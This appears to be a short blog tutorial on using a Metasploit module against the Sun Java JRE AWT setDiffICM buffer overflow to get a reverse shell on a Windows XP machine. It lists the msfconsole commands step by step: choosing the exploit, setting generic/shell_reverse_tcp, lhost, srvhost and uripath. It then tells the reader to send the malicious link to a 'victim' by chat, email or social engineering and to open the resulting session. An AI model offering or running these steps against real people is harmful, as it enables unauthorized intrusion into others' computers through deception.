Hack Remote PC with Sun Java JRE AWT setDiffICM Buffer Overflow

This module exploits a flaw in the setDiffICM function in the Sun JVM. The payload is serialized and passed to the applet via PARAM tags. It must be a native payload. The effected Java versions are JDK and JRE 6 Update 16 and earlier, JDK and JRE 5.0 Update 21 and earlier, SDK and JRE 1.4.2_23 and earlier, and SDK and JRE 1.3.1_26 and earlier. NOTE: Although all of the above versions are reportedly vulnerable, only 1.6.0_u11 and 1.6.0_u16 on Windows XP SP3 were tested.

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 update 16


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/java_setdifficm_bof

Msf exploit (java_setdifficm_bof)>set payload generic/shell_reverse_tcp

Msf exploit (java_setdifficm_bof)>set lhost (IP of Local Host)

Msf exploit (java_setdifficm_bof)>set srvhost (This must be an address on the local machine)

Msf exploit (java_setdifficm_bof)>set uripath rulebook (The Url to use for this exploit)

Msf exploit (java_setdifficm_bof)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Leave a Reply

Your email address will not be published. Required fields are marked *